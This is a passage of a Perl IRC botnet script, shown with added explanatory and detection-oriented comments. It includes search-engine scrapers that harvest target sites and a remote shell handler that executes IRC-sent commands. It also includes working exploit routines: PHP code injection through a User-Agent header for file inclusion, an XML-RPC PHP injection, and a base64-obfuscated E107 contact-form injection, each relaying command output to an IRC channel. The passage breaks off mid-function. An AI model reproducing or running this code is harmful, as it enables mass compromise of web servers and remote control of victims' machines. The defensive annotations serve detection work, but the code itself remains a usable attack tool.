  1691. my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".uri_escape($key)."&st=local");
  1692. my $res = &search_engine_query($search);
  # No "Next" on the page: jump the counter to the bound so this is the last
  # iteration (the current page is still parsed below).
  1693. if ($res !~ m/Next/i) {$b=50;}
  1694. while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
  1695. my $link = $1;
  1696. if ($1 !~ /\.sapo\.pt/){
  1697. my @grep = &links($link);
  1698. push(@list,@grep);
  1699. }
  1700. }
  1701. }
  1702. return @list;
  1703. }
  1704.  
  # lycos($key)
  # Result scraper for search.lycos.com: requests pn=0..50 (51 requests),
  # extracts URLs found in title="http://..." attributes, skips those on
  # lycos.com, and expands each hit through links().
  # $b is the undeclared package variable. Returns the accumulated list.
  1705. sub lycos() {
  1706. my @list;
  1707. my $key = $_[0];
  1708. for ($b=0; $b<=50; $b+=1) {
  1709. my $search = ("http://search.lycos.com/web?q=".uri_escape($key)."&pn=".$b);
  1710. my $res = &search_engine_query($search);
  1711. while ($res =~ m/title=\"http:\/\/(.*?)\"/g) {
  1712. my $link = $1;
  1713. if ($link !~ /lycos\.com/){
  1714. my @grep = &links($link);
  1715. push(@list,@grep);
  1716. }
  1717. }
  1718. }
  1719. return @list;
  1720. }
  1721.  
  # uol($key)
  # Result scraper for busca.uol.com.br: the start offset steps by 10 up to
  # 1000. Extracts http:// hrefs (opening quote optional), skips those matching
  # uol.com.br or "/web" (case-insensitive), and expands each hit through
  # links(). $b is the undeclared package variable.
  # Returns the accumulated list.
  1722. sub uol() {
  1723. my @list;
  1724. my $key = $_[0];
  1725. for ($b=0; $b<=1000; $b+=10) {
  1726. my $search = ("http://busca.uol.com.br/web/?ref=homeuol&q=".uri_escape($key)."&start=".$b);
  1727. my $res = &search_engine_query($search);
  # On the engine's "no results" text the counter is set to 500; the loop bound
  # is 1000, so this repositions the counter rather than ending the loop.
  1728. if ($res =~ m/retornou nenhum resultado/i) {$b=500;}
  1729. while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
  1730. my $link = $1;
  1731. if ($link !~ /uol\.com\.br|\/web/i){
  1732. my @grep = &links($link);
  1733. push(@list,@grep);
  1734. }
  1735. }
  1736. }
  1737. return @list;
  1738. }
  1739.  
  # seznam($key)
  # Result scraper for search.seznam.cz: requests from=1..281 in steps of 20
  # (15 requests, 20 results each), extracts http:// hrefs, skips the engine's
  # own and related domains listed in the exclusion pattern, and expands each
  # hit through links(). $b is the undeclared package variable.
  # Returns the accumulated list.
  1740. sub seznam() {
  1741. my @list;
  1742. my $key = $_[0];
  1743. for ($b=1; $b<=300; $b+=20) {
  1744. my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=20&from=".$b);
  1745. my $res = &search_engine_query($search);
  1746. while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
  1747. my $link = $1;
  1748. if ($link !~ /seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i){
  1749. my @grep = &links($link);
  1750. push(@list,@grep);
  1751. }
  1752. }
  1753. }
  1754. return @list;
  1755. }
  1756.  
  # hotbot($key)
  # Result scraper for www.hotbot.com: requests pn=0..50, extracts http:// hrefs
  # that are followed by a title attribute, skips those on hotbot.com, and
  # expands each hit through links(). $b is the undeclared package variable.
  # Returns the accumulated list.
  1757. sub hotbot() {
  1758. my @list;
  1759. my $key = $_[0];
  1760. for ($b=0; $b<=50; $b+=1) {
  1761. my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".uri_escape($key));
  1762. my $res = &search_engine_query($search);
  # "No web result" text: jump the counter to the bound so this is the last iteration.
  1763. if ($res =~ m/had no web result/i) {$b=50;}
  1764. while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) {
  1765. my $link = $1;
  1766. if ($link !~ /hotbot\.com/){
  1767. my @grep = &links($link);
  1768. push(@list,@grep);
  1769. }
  1770. }
  1771. }
  1772. return @list;
  1773. }
  1774.  
  # aol($key)
  # Result scraper for search.aol.com: requests page=0..300 in steps of 10 (31
  # requests), extracts http:// hrefs, skips those on aol.com, and expands each
  # hit through links(). $b is the undeclared package variable.
  # Returns the accumulated list.
  1775. sub aol() {
  1776. my @list;
  1777. my $key = $_[0];
  1778. for ($b=0; $b<=300; $b+=10) {
  1779. my $search = ("http://search.aol.com/aol/search?q=".uri_escape($key)."&page=".$b);
  1780. my $res = &search_engine_query($search);
  1781. while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
  1782. my $link = $1;
  1783. if ($link !~ /aol\.com/){
  1784. my @grep = &links($link);
  1785. push(@list,@grep);
  1786. }
  1787. }
  1788. }
  1789. return @list;
  1790. }
  1791.  
  # biglobe($key)
  # Result scraper for cgi.search.biglobe.ne.jp: requests start=1..491 in steps
  # of 10 (50 requests), extracts http:// hrefs, skips those containing
  # "biglobe", and expands each hit through links().
  # $b and $num are not declared in this sub, so both are package variables.
  # Returns the accumulated list.
  1792. sub biglobe {
  1793. my $key = $_[0];
  1794. my @list;
  1795. for ($b=1; $b<=500; $b+=10) {
  # $num is doubled on every pass and sent as the "num" query parameter; its
  # starting value is whatever the package variable holds when this is called.
  1796. $num += $num;
  1797. my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=".$num."&q=".uri_escape($key)."&lr=all";
  1798. my $res = &search_engine_query($search);
  1799. while ( $res =~ m/<a href=\"http:\/\/(.+?)\"/g ) {
  1800. my $link = $1;
  1801. if ($link !~ /biglobe/){
  1802. my @grep = &links($link);
  1803. push(@list,@grep);
  1804. }
  1805. }
  1806. }
  1807. return @list;
  1808. }
  1809.  
  1810. #########################################
  1811.  
  # clean(@items)
  # Normalises and de-duplicates a list of host/path strings: every run of
  # slashes is collapsed to a single "/", and only the first occurrence of each
  # resulting string is kept, in original order.
  # Because foreach aliases the elements of @_, the substitution also rewrites
  # the caller's array elements in place.
  1812. sub clean() {
  1813. my @cln = ();
  1814. my %visit = ();
  1815. foreach my $element (@_) {
  1816. $element =~ s/\/+/\//g;
  # Post-increment: false the first time a value is seen, true afterwards.
  1817. next if $visit{$element}++;
  1818. push @cln, $element;
  1819. }
  1820. return @cln;
  1821. }
  1822.  
  # links($link)
  # Expands one scheme-less result string ("host/path/file") into three
  # candidates, each ending in "/" with "//" collapsed to "/":
  #   $link - the string as given,
  #   $host - the leading host-name characters only,
  #   $hdir - the string with its last path segment removed.
  # Returns the list ($link, $host, $hdir); the three may be identical for a
  # bare host name, which clean() later de-duplicates.
  1823. sub links() {
  1824. my @list;
  1825. my $link = $_[0];
  1826. my $host = $_[0];
  1827. my $hdir = $_[0];
  # "\1" in the replacement is the older spelling of $1.
  1828. $hdir =~ s/(.*)\/[^\/]*$/\1/;
  1829. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  1830. $host .= "/";
  1831. $link .= "/";
  1832. $hdir .= "/";
  1833. $host =~ s/\/\//\//g;
  1834. $hdir =~ s/\/\//\//g;
  1835. $link =~ s/\/\//\//g;
  1836. push(@list,$link,$host,$hdir);
  1837. return @list;
  1838. }
  1839.  
  # search_engine_query($url)
  # Fetches $url over a raw TCP socket to port 80 instead of using LWP, and
  # returns everything read from the socket (status line and headers included)
  # joined with single spaces. Returns "" when the connection fails or anything
  # inside the eval dies; errors are not reported.
  # The host is taken from the leading host-name characters of the URL and then
  # removed from the URL with an unescaped regex to obtain the request path.
  # Defensive notes: the request this builds has a fixed, recognisable shape:
  # HTTP/1.0, "Accept: */*", and a misspelled "Connetion: Close" header. That
  # misspelling is a usable network or proxy-log signature for traffic
  # generated by this routine. The User-Agent value comes from the global
  # $uagent, set outside this excerpt.
  1840. sub search_engine_query() {
  1841. my $url = $_[0];
  1842. $url =~ s/http:\/\///;
  1843. my $host = $url;
  1844. my $query = $url;
  1845. my $page = "";
  1846. $host =~ s/href=\"?http:\/\///;
  1847. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  1848. $query =~ s/$host//;
  1849. if ($query eq "") { $query = "/"; }
  1850. eval {
  # "or return" leaves the eval block only; the sub then returns the empty $page.
  1851. my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
  1852. my $sget = "GET $query HTTP/1.0\r\n";
  1853. $sget .= "Host: $host\r\n";
  1854. $sget .= "Accept: */*\r\n";
  1855. $sget .= "User-Agent: $uagent\r\n";
  1856. $sget .= "Connetion: Close\r\n\r\n";
  1857. print $sock $sget;
  # Reads until the server closes the connection; no read timeout is set here.
  1858. my @pages = <$sock>;
  1859. $page = "@pages";
  1860. close($sock);
  1861. };
  1862. return $page;
  1863. }
  1864.  
  1865. #########################################
  1866.  
  # shell($path, $cmd)
  # Remote-command handler: runs $cmd on the machine hosting this script and
  # relays the output, line by line, to the IRC target $path.
  #   - "cd <dir>" is handled in-process with chdir(), so the new working
  #     directory persists for later commands; failure is reported to $path.
  #   - Anything else is executed through backticks (i.e. via the shell) in a
  #     double-forked grandchild, with stderr and fd 3 redirected into the
  #     captured output.
  # Output is throttled: after every five lines the child sleeps three seconds.
  # Defensive notes: on a host where this script is found running, this sub is
  # the arbitrary-command channel, so the whole account it runs under should be
  # treated as compromised. Short-lived shell children of a long-running perl
  # process that holds an outbound IRC connection are the process-level trace.
  1867. sub shell() {
  1868. my $path = $_[0];
  1869. my $cmd = $_[1];
  1870. if ($cmd =~ /cd (.*)/) {
  1871. chdir("$1") || &msg("$path","No such file or directory");
  1872. return;
  1873. }
  1874. elsif ($pid = fork) { waitpid($pid, 0); }
  1875. else { if (fork) { exit; } else {
  1876. my @output = `$cmd 2>&1 3>&1`;
  1877. my $c = 0;
  1878. foreach my $output (@output) {
  1879. $c++;
  # chop removes the last character unconditionally (normally the newline).
  1880. chop $output;
  1881. &msg("$path","$output");
  1882. if ($c == 5) { $c = 0; sleep 3; }
  1883. }
  1884. exit;
  1885. }}
  1886. }
  1887.  
  # isAdmin($nick)
  # Returns 1 when $nick is string-equal to the global $admin, otherwise 0.
  # The only check visible here is an exact, case-sensitive comparison of the
  # IRC nickname; no hostmask or password is consulted in this sub.
  1888. sub isAdmin() {
  1889. my $status = 0;
  1890. my $nick = $_[0];
  1891. if ($nick eq $admin) { $status = 1; }
  1892. return $status;
  1893. }
  1894.  
  # msg($target, $text)
  # Sends "PRIVMSG <target> :<text>" through sendraw() on the global socket
  # $IRC_cur_socket. Does nothing unless called with exactly two arguments.
  # sendraw() is defined outside this excerpt. All reporting in this file,
  # including harvested credentials, leaves through this call as plain IRC text.
  1895. sub msg() {
  1896. return unless $#_ == 1;
  1897. sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
  1898. }
  1899.  
  # nick($newnick)
  # Sends "NICK <newnick>" through sendraw(). Does nothing unless called with
  # exactly one argument.
  # NOTE(review): unlike msg(), sendraw() is called here with the command string
  # only and no socket argument; sendraw() is not visible in this excerpt, so
  # whether it accepts that form cannot be confirmed from here.
  1900. sub nick() {
  1901. return unless $#_ == 0;
  1902. sendraw("NICK $_[0]");
  1903. }
  # notice($target, $text)
  # Sends "NOTICE <target> :<text>" through sendraw(). Does nothing unless
  # called with exactly two arguments.
  # NOTE(review): as in nick(), sendraw() is called without the socket argument
  # that msg() passes; sendraw() is not visible in this excerpt.
  1904. sub notice() {
  1905. return unless $#_ == 1;
  1906. sendraw("NOTICE $_[0] :$_[1]");
  1907. }
  1908.  
  # cmdlfi($url, $cmd, $chan)
  # Sends one GET to $url whose User-Agent header is not a browser string but a
  # PHP snippet wrapping $cmd, delimited by the literal markers "lobex" and
  # "byroe". Whatever appears between those markers in the response is relayed
  # to $chan; otherwise "No Output" is reported. $cmd is placed inside a
  # double-quoted PHP string without escaping.
  # Defensive notes: a User-Agent header containing "<?" or "system(" is never
  # legitimate, so a WAF or log rule on the User-Agent value catches every
  # request this sub makes. The markers "lobex" and "byroe" in response bodies
  # or logs are further indicators. Keeping request headers out of any file the
  # application can be made to include closes the underlying weakness.
  1909. sub cmdlfi() {
  1910. my $browser = LWP::UserAgent->new;
  1911. my $url = $_[0];
  1912. my $cmd = $_[1];
  1913. my $chan = $_[2];
  1914. my $hie = "lobex<?system(\"$cmd 2> /dev/stdout\"); ?>byroe";
  1915. $browser->agent("$hie");
  1916. $browser->timeout(7);
  # $response is not declared with "my" and is therefore a package variable.
  1917. $response = $browser->get( $url );
  1918. if ($response->content =~ /lobex(.*)byroe/s) {
  1919. &msg("$chan","$lfilogo ".$1." ");
  1920. } else {
  1921. &msg("$chan","$lfilogo No Output ");
  1922. }
  1923. }
  1924.  
  # cmdxml($jed, $dwa, $chan)
  # POSTs an XML-RPC methodCall document to the URL $jed with Content-Type
  # text/xml. The <name> element carries a quote-breaking prefix followed by
  # PHP that echoes the marker "bamby", runs $dwa through system(), and echoes
  # "solo". Text between the two markers in the response is relayed to $chan;
  # otherwise "No Output" is reported.
  # Defensive notes: requests from this sub have the fixed User-Agent
  # "perl post" and a text/xml body containing "system(" inside a methodCall;
  # either is a workable detection rule for XML-RPC endpoints. The markers
  # "bamby" and "solo" adjacent to command output in a response indicate the
  # endpoint evaluated the payload and needs patching or removal.
  1925. sub cmdxml() {
  1926. my $jed = $_[0];
  1927. my $dwa = $_[1];
  1928. my $chan = $_[2];
  1929. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
  # $exploit is not declared with "my" and is therefore a package variable.
  1930. $exploit = "<?xml version=\"1.0\"?><methodCall>";
  1931. $exploit .= "<methodName>test.method</methodName>";
  1932. $exploit .= "<params><param><value><name>',''));";
  1933. $exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";
  1934. my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
  1935. if ($response->content =~ /bamby(.*)solo/s) {
  1936. &msg("$chan","$xmllogo $1 ");
  1937. } else {
  1938. &msg("$chan","$xmllogo No Output ");
  1939. }
  1940. }
  1941.  
  1942. sub cmde107() {
  1943. my $path = $_[0];
  1944. my $code = $_[1];
  1945. my $chan = $_[2];
  1946. my $codecmd = encode_base64($code);
  1947. my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"));';
  1948. my $req = HTTP::Request->new(POST => $path);
  1949. $req->content_type('application/x-www-form-urlencoded');
  1950. $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
  1951. my $ua = LWP::UserAgent->new(agent => $uagent);
  1952. $ua->timeout(7);
  1953. my $res = $ua->request($req);
  1954. my $data = $res->as_string;
  1955. if ( $data =~ /ByroeNet(.*)/ ){
  1956. $mydata = $1;
  1957. &msg("$chan","(E107) $mydata ");
  1958. }
  1959. else { &msg("$chan","(E107) No Output "); }